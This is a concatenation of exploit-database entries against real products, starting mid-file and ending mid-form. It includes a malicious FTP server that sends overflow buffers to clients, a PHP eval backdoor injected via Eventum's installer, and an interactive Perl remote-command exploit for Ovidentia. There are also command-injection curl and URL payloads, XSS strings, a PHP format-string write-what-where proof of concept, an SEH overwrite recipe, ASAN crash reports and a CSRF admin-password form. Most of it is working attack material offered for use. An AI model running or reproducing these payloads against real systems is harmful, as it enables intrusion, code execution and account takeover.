SYST(self,cmd): self.conn.send('215 UNIX Type: L8\r\n') def OPTS(self,cmd): if cmd[5:-2].upper()=='UTF8 ON': self.conn.send('200 OK.\r\n') else: self.conn.send('451 Sorry.\r\n') def USER(self,cmd): self.conn.send('331 OK.\r\n') def PASS(self,cmd): self.conn.send('230 OK.\r\n') #self.conn.send('530 Incorrect.\r\n') def QUIT(self,cmd): self.conn.send('221 Goodbye.\r\n') def NOOP(self,cmd): self.conn.send('200 OK.\r\n') def TYPE(self,cmd): self.mode=cmd[5] self.conn.send('200 Binary mode.\r\n') def CDUP(self,cmd): if not os.path.samefile(self.cwd,self.basewd): #learn from stackoverflow self.cwd=os.path.abspath(os.path.join(self.cwd,'..')) self.conn.send('200 OK.\r\n') def PWD(self,cmd): cwd=os.path.relpath(self.cwd,self.basewd) if cwd=='.': cwd='/' else: cwd='/'+cwd self.conn.send('257 \"%s\"\r\n' % cwd) def CWD(self,cmd): chwd=cmd[4:-2] if chwd=='/': self.cwd=self.basewd elif chwd[0]=='/': self.cwd=os.path.join(self.basewd,chwd[1:]) else: self.cwd=os.path.join(self.cwd,chwd) self.conn.send('250 OK.\r\n') def PORT(self,cmd): if self.pasv_mode: self.servsock.close() self.pasv_mode = False l=cmd[5:].split(',') self.dataAddr='.'.join(l[:4]) self.dataPort=(int(l[4])<<8)+int(l[5]) self.conn.send('200 Get port.\r\n') def PASV(self,cmd): # from http://goo.gl/3if2U self.pasv_mode = True self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) self.servsock.bind((local_ip,0)) self.servsock.listen(1) ip, port = self.servsock.getsockname() print 'open', ip, port self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' % (','.join(ip.split('.')), port>>8&0xFF, port&0xFF)) def start_datasock(self): if self.pasv_mode: self.datasock, addr = self.servsock.accept() print 'connect:', addr else: self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) self.datasock.connect((self.dataAddr,self.dataPort)) def stop_datasock(self): self.datasock.close() if self.pasv_mode: self.servsock.close() def LIST(self,cmd): self.conn.send('150 Here comes the directory listing.\r\n') self.start_datasock() for t in os.listdir(self.cwd): k=self.toListItem(os.path.join(self.cwd,t)) self.datasock.send(buff + buff + buff + '\r\n') print "[+] Crafted packet sent . . . [+]" #self.datasock.send(buff + buff + '\r\n') self.stop_datasock() self.conn.send('226 Directory send OK.\r\n') def toListItem(self,fn): st=os.stat(fn) fullmode='rwxrwxrwx' mode='' for i in range(9): mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-' d=(os.path.isdir(fn)) and 'd' or '-' ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime)) return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn) def MKD(self,cmd): dn=os.path.join(self.cwd,cmd[4:-2]) os.mkdir(dn) self.conn.send('257 Directory created.\r\n') def RMD(self,cmd): dn=os.path.join(self.cwd,cmd[4:-2]) if allow_delete: os.rmdir(dn) self.conn.send('250 Directory deleted.\r\n') else: self.conn.send('450 Not allowed.\r\n') def DELE(self,cmd): fn=os.path.join(self.cwd,cmd[5:-2]) if allow_delete: os.remove(fn) self.conn.send('250 File deleted.\r\n') else: self.conn.send('450 Not allowed.\r\n') def RNFR(self,cmd): self.rnfn=os.path.join(self.cwd,cmd[5:-2]) self.conn.send('350 Ready.\r\n') def RNTO(self,cmd): fn=os.path.join(self.cwd,cmd[5:-2]) os.rename(self.rnfn,fn) self.conn.send('250 File renamed.\r\n') def REST(self,cmd): self.pos=int(cmd[5:-2]) self.rest=True self.conn.send('250 File position reseted.\r\n') def RETR(self,cmd): fn=os.path.join(self.cwd,cmd[5:-2]) #fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/') print 'Downlowding:',fn if self.mode=='I': fi=open(fn,'rb') else: fi=open(fn,'r') self.conn.send('150 Opening data connection.\r\n') if self.rest: fi.seek(self.pos) self.rest=False data= fi.read(1024) self.start_datasock() while data: self.datasock.send(data) data=fi.read(1024) fi.close() self.stop_datasock() self.conn.send('226 Transfer complete.\r\n') def STOR(self,cmd): fn=os.path.join(self.cwd,cmd[5:-2]) print 'Uplaoding:',fn if self.mode=='I': fo=open(fn,'wb') else: fo=open(fn,'w') self.conn.send('150 Opening data connection.\r\n') self.start_datasock() while True: data=self.datasock.recv(1024) if not data: break fo.write(data) fo.close() self.stop_datasock() self.conn.send('226 Transfer complete.\r\n') class FTPserver(threading.Thread): def __init__(self): self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.sock.bind((local_ip,local_port)) threading.Thread.__init__(self) def run(self): self.sock.listen(5) while True: th=FTPserverThread(self.sock.accept()) th.daemon=True th.start() def stop(self): self.sock.close() if __name__=='__main__': ftp=FTPserver() ftp.daemon=True ftp.start() print 'On', local_ip, ':', local_port raw_input('Enter to end...\n') ftp.stop()

Advisory ID: HTB23198 Product: Eventum Vendor: Eventum Development Team Vulnerable Version(s): 2.3.4 and probably prior Tested Version: 2.3.4 Advisory Publication: January 22, 2014 [without technical details] Vendor Notification: January 22, 2014 Vendor Patch: January 24, 2014 Public Disclosure: January 27, 2014 Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94] CVE References: CVE-2014-1631, CVE-2014-1632 Risk Level: Critical CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application. 1) Incorrect Default Permissions in Eventum: CVE-2014-1631 The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application. The installation script can be access by a remote unauthenticated user via the following URL: http://[host]/setup/index.php 2) Code Injection in Eventum: CVE-2014-1632 The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server. The following exploitation example injects a backdoor into "/config/config.php" file: <form action="http://[host]/setup/index.php" method="post" name="main"> <input type="hidden" name="cat" value="install"> <input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('"> <input type="hidden" name="relative" value="/"> <input type="hidden" name="db_hostname" value="db_hostname"> <input type="hidden" name="db_name" value="db_name"> <input type="hidden" name="db_table_prefix" value="db_table_prefix"> <input type="hidden" name="drop_tables" value="yes"> <input type="hidden" name="db_username" value="db_username"> <input type="hidden" name="setup[smtp][from]" value="email@email.com"> <input type="hidden" name="setup[smtp][host]" value="localhost"> <input type="hidden" name="setup[smtp][port]" value="25"> <input type="hidden" name="" value=""> <input type="submit" id="btn"> </form> After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system: http://[host]/index.php?cmd=phpinfo%28%29; ----------------------------------------------------------------------------------------------- Solution: Update to Eventum 2.3.5 More Information: https://bugs.launchpad.net/eventum/+bug/1271499 Vendor disclosed vulnerabilities and authorized us to release advisory on public before our usual delay (3 weeks). ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum. [2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

# Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability # Author: bd0rk # eMail: bd0rk[at]hackermail.com # Twitter: twitter.com/bd0rk # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832 PoC: /online-2-8/programs/admin.php line 2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ require_once( $GLOBALS['babAddonPhpPath']."functions.php"); ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+]Exploit: http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE? Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once. So it's possible to compromise the web-server about it. An attacker can inject s0me php-shellcode. I think, it's a big problem in this web-software! Patch: You can declare the vulnerable parameter or use an alert. ~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~

******************************************************************************************** # Exploit: b64dec SEH OverWrite. # Date: 12/18/2015 # Exploit Author: Un_N0n # Vendor: Tim Rohlfs # Software Link: http://4mhz.de/b64dec.html # Version: 1.1.2 # Tested on: Windows 7 x64(64bit) ******************************************************************************************** [Dump] SEH chain of thread 00000EC0 Address SE handler 024CFC50 b64dec.00458140 024CFC5C b64dec.004581B3 024CFF28 b64dec.0045847C 024CFF00 41414141 <------- 41414141 *** CORRUPT ENTRY *** <------- ---------------------------------------------------- 024CFEE4 41414141 AAAA 024CFEE8 41414141 AAAA 024CFEEC 41414141 AAAA 024CFEF0 41414141 AAAA 024CFEF4 41414141 AAAA 024CFEF8 41414141 AAAA 024CFEFC 41414141 AAAA 024CFF00 41414141 AAAA Pointer to next SEH record <----- 024CFF04 41414141 AAAA SE handler <----- 024CFF08 41414141 AAAA 024CFF0C 41414141 AAAA 024CFF10 41414141 AAAA 024CFF14 41414141 AAAA 024CFF18 41414141 AAAA [How to?] 1 - Open up b64dec.exe 2 - In Search field, paste in the contents of Crash.txt 3 - Hit 'Decode' ~ Software Crashes due to SEH Over-Write. [Crash.txt?] AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD --------------------------------------|-----| NSEH SEH [Extra Info] Offset = 620 ********************************************************************************************

# Title: Ovidentia Widgets 1.0.61 Remote Command Execution Exploit # Author: bd0rk # eMail: bd0rk[at]hackermail.com # Twitter: twitter.com/bd0rk # Tested on: Ubuntu-Linux # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FLibrairies+partagees%2FWidgets&file=widgets-1-0-61.zip&idf=870 # The $GLOBALS['babInstallPath']-parameter in /programs/groups.php line 24 is vulnerable for it. # Use some shellcode / c99 for example. ---------------- ~~Exploitcode~~ ---------------- use LWP::UserAgent; use HTTP::Request; use LWP::Simple; use Getopt::Long; sub clear{ system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } &clear(); sub bd0rk { print "Ovidentia Widgets 1.0.61 Remote Command Execution Exploit\n"; print "Sploit:\n"; print "$0 -v \"http://[target]/path/programs/\" -shellcode \"http://[target]/shell.txt?\"\n\n"; exit(); } my $a = GetOptions ( 'v=s' => \$v, 'shellcode=s' => \$shellcode ); &bd0rk unless ($v); &bd0rk unless ($shellcode); &bd0rk if $bd0rk eq 1; chomp($v); chomp($shellcode); while (){ print "[shellcode]:~\$ "; chomp($cmd=<STDIN>); if ($cmd eq "exit" || $cmd eq "quit") { exit 0; } my $agent = LWP::UserAgent->new; $in="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1"; chomp($in); my $a = $v ."/widgets-1-0-61/programs/groups.php?GLOBALS[babInstallPath]=" . $shellcode . $in; chomp $a; my $request = HTTP::Request->new(Get => $a); my $resource = $agent->request($request); my $content = $resource->content; if ($resource->is_success){ print $1,"\n" if ($content =~ m/readonly> (.*?)\<\/textarea>/mosix); } else { print "EXPLOIT FAILURE\n"; exit(1); } }

source: https://www.securityfocus.com/bid/65306/info WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. http://www.example.com/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply http://www.example.com/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply

Source: https://code.google.com/p/google-security-research/issues/detail?id=568 There is a use-after-free in Sound.setTransform. If a transform value is set to an object with valueOf defined, it can free the transform before the values are set. A minimal PoC is as follows: this.createEmptyMovieClip("my_mc", 1); var my_sound:Sound = new Sound("my_mc"); var o = {valueOf : func}; my_sound.attachSound("world"); my_sound.setTransform({ll : o, lr: 0x77777777, rr : 0x77777777, rl : 0x77777777}); my_sound.start(); function func(){ my_mc.removeMovieClip(); return 0x77777777; } A sample swf and fla are attached. Note that these PoCs will not cause a crash. Instead, they demonstrate the use-after-free by overwriting the matrix array of a ConvolutionFilter. The use-after-free changes the array from being all zeros to having values of float 0x77777777 at the end. The test fails if the second array is not all zero. The test passes if the second array is all zero. These PoCs only work on 64-bit systems. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39072.zip

source: https://www.securityfocus.com/bid/65306/info WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls -lash /etc%23&ping_count=1&action=Apply&html_view=ping" "http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null

Source: https://code.google.com/p/google-security-research/issues/detail?id=657 The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): --- cut --- ==6158==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200035b1df at pc 0x0000004aaf85 bp 0x7ffcdca29930 sp 0x7ffcdca290e0 READ of size 16 at 0x60200035b1df thread T0 #0 0x4aaf84 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 #1 0x7fc44e6a216a in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:454:5 #2 0x7fc44e6a0fd6 in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1405:21 #3 0x7fc44e698b78 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:563:13 #4 0x7fc44e69749b in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:695:21 #5 0x7fc44f596013 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17767:9 #6 0x7fc44f569dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10 #7 0x7fc44e4f8cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 #8 0x7fc44e4eb5ea in call_dissector_work wireshark/epan/packet.c:691:9 #9 0x7fc44e4f52be in call_dissector_only wireshark/epan/packet.c:2662:8 #10 0x7fc44e4e6ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 #11 0x7fc44f51c032 in dissect_wlan_radio wireshark/epan/dissectors/packet-ieee80211-radio.c:975:10 #12 0x7fc44e4f8cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 #13 0x7fc44e4eb5ea in call_dissector_work wireshark/epan/packet.c:691:9 #14 0x7fc44e4f52be in call_dissector_only wireshark/epan/packet.c:2662:8 #15 0x7fc44e4e6ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 #16 0x7fc44f52d965 in dissect_radiotap wireshark/epan/dissectors/packet-ieee80211-radiotap.c:1796:2 #17 0x7fc44e4f8cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 #18 0x7fc44e4eb5ea in call_dissector_work wireshark/epan/packet.c:691:9 #19 0x7fc44e4eadbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9 #20 0x7fc44f1fa5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11 #21 0x7fc44e4f8cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8 #22 0x7fc44e4eb5ea in call_dissector_work wireshark/epan/packet.c:691:9 #23 0x7fc44e4f52be in call_dissector_only wireshark/epan/packet.c:2662:8 #24 0x7fc44e4e6ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8 #25 0x7fc44e4e633b in dissect_record wireshark/epan/packet.c:501:3 #26 0x7fc44e4943c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2 #27 0x5264eb in process_packet wireshark/tshark.c:3728:5 #28 0x51f960 in load_cap_file wireshark/tshark.c:3484:11 #29 0x515daf in main wireshark/tshark.c:2197:13 0x60200035b1df is located 0 bytes to the right of 15-byte region [0x60200035b1d0,0x60200035b1df) allocated by thread T0 here: #0 0x4c0bc8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 #1 0x7fc446a1c610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610) SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy Shadow bytes around the buggy address: 0x0c04800635e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c04800635f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0480063600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0480063610: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0480063620: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c0480063630: fa fa fa fa fa fa fa fa fa fa 00[07]fa fa 00 00 0x0c0480063640: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c0480063650: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c0480063660: fa fa 00 00 fa fa 00 00 fa fa fd fd fa fa 01 fa 0x0c0480063670: fa fa 06 fa fa fa fd fd fa fa fd fd fa fa 00 07 0x0c0480063680: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==6158==ABORTING --- cut --- The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11826. Attached are two files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39077.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=658 The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"): --- cut --- ==6473==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x7f391e585d1e bp 0x7ffc0ff625c0 sp 0x7ffc0ff625b8 READ of size 1 at 0x61b00001335c thread T0 #0 0x7f391e585d1d in infer_pkt_encap wireshark/wiretap/ngsniffer.c:1767:27 #1 0x7f391e582ac7 in fix_pseudo_header wireshark/wiretap/ngsniffer.c:1805:11 #2 0x7f391e57d07e in ngsniffer_process_record wireshark/wiretap/ngsniffer.c:1299:20 #3 0x7f391e576418 in ngsniffer_read wireshark/wiretap/ngsniffer.c:1034:9 #4 0x7f391e62429b in wtap_read wireshark/wiretap/wtap.c:1309:7 #5 0x51f7ea in load_cap_file wireshark/tshark.c:3479:12 #6 0x515daf in main wireshark/tshark.c:2197:13 0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c) allocated by thread T0 here: #0 0x4c0bc8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 #1 0x7f390a251610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610) #2 0x7f391e48d0e5 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2 #3 0x51bd1d in cf_open wireshark/tshark.c:4195:9 #4 0x51584e in main wireshark/tshark.c:2188:9 SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/wiretap/ngsniffer.c:1767:27 in infer_pkt_encap Shadow bytes around the buggy address: 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffa6b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==6473==ABORTING --- cut --- The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11827. Attached are two files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39076.zip

source: https://www.securityfocus.com/bid/65350/info Web Video Streamer is prone to following multiple security vulnerabilities: 1. Multiple cross-site scripting vulnerabilities 2. A directory-traversal vulnerability 3. A command-injection vulnerability A remote attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and gain access to sensitive information, which may aid in launching further attacks. Web Video Streamer 1.0 is vulnerable; other versions may also be affected. http://www.example.com/webstreamer-master/player.php?name=drops.avi&file=drop.avi';ls>/tmp/foo;a'&type=video/mp4&t=1389685059 http://www.example.com/webstreamer-master/index.php?dir=../../../ XSS: http://www.example.com/webstreamer-master/player.php?name=%3Cscript%3Ealert%281%29%3C/script%3Etest http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E

source: https://www.securityfocus.com/bid/65408/info Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Atmail 7.0.2 is vulnerable; other versions may also be affected. http://www.example.com/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/[XSS]

source: https://www.securityfocus.com/bid/65408/info Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Atmail 7.0.2 is vulnerable; other versions may also be affected. http://www.example.com/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=[XSS]

source: https://www.securityfocus.com/bid/65408/info Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. Atmail 7.0.2 is vulnerable; other versions may also be affected. http://www.example.com/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=[XSS]

Overview -------------------------------------------- A fun little format string vulnerability exists in PHP 7.0.0 due to how non-existent class names are handled. From my limited research I believe this issue is likely exploitable for full code execution (see test script below). This issue does not appear to be present in previous PHP versions and has been patched in version 7.0.1. If you build a working exploit, drop me a line, I'd love to see (andrew at jmpesp dot org). Shout out to the PHP team for fixing this so quickly and for building a great product. Greetz to my DSU crew. Timeline -------------------------------------------- 12/11/2015: Discovered 12/12/2015: Reported to PHP team 12/13/2015: Patch accepted and committed 12/17/2015: PHP 7.0.1 released containing patch 12/22/2015: Publicly disclosed Vulnerability/Patch -------------------------------------------- diff -rup php-7.0.0_old/Zend/zend_execute_API.c php-7.0.0_new/Zend/zend_execute_API.c --- php-7.0.0_old/Zend/zend_execute_API.c 2015-12-01 07:36:25.000000000 -0600 +++ php-7.0.0_new/Zend/zend_execute_API.c 2015-12-12 12:24:24.999391117 -0600 @@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc zend_vspprintf(&message, 0, format, va); if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) { - zend_throw_error(exception_ce, message); + zend_throw_error(exception_ce, "%s", message); } else { zend_error(E_ERROR, "%s", message); } Proof of Concept #1 (simple segfault) -------------------------------------------- <?php $name="%n%n%n%n%n"; $name::doSomething(); ?> Proof of Concept #2 (write-what-where primitive) -------------------------------------------- andrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php <?php ini_set("memory_limit", "4G"); // there's probably a much cleaner way to do this $rdx = 0x42424242; // what $rax = 0x43434343; // where $name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax - 34)); // your offsets may differ. $name::doSomething(); ?> andrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php GNU gdb (GDB) 7.10 Copyright (C) 2015 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-unknown-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from sapi/cli/php...done. (gdb) r /tmp/test.php Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". Program received signal SIGSEGV, Segmentation fault. 0x0000000000672935 in xbuf_format_converter (xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\001', fmt=<optimized out>, ap=0x7fffffffa658) at /tmp/php-7.0.0_64/main/spprintf.c:744 744 *(va_arg(ap, int *)) = is_char? (int)((smart_string *)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s); (gdb) i r rax 0x43434343 1128481603 rbx 0x7fffb2800016 140736188121110 rcx 0x6e 110 rdx 0x42424242 1111638594 rsi 0x7fffffff9db0 140737488330160 rdi 0x7fffffffa658 140737488332376 rbp 0x1 0x1 rsp 0x7fffffff9d50 0x7fffffff9d50 r8 0x7fffffff9db0 140737488330160 r9 0x7fffb2800016 140736188121110 r10 0x0 0 r11 0x0 0 r12 0x20 32 r13 0x7fffffffa610 140737488332304 r14 0x0 0 r15 0x4242423a 1111638586 rip 0x672935 0x672935 <xbuf_format_converter+1845> eflags 0x10202 [ IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) x/1i $rip => 0x672935 <xbuf_format_converter+1845>: mov DWORD PTR [rax],edx (gdb)

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Grawlix 1.0.3 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://www.getgrawlix.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/17/2015 Disclosed to public: 12/21/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. An attacker can for example change the password of an existing admin account, which may in turn lead to code execution via a different vulnerability in the admin area. 3. Proof of Concept Change admin password: <html> <body> <form action="http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php" method="POST"> <input type="hidden" name="username[1]" value="admin" /> <input type="hidden" name="email[1]" value="admin@example.com" /> <input 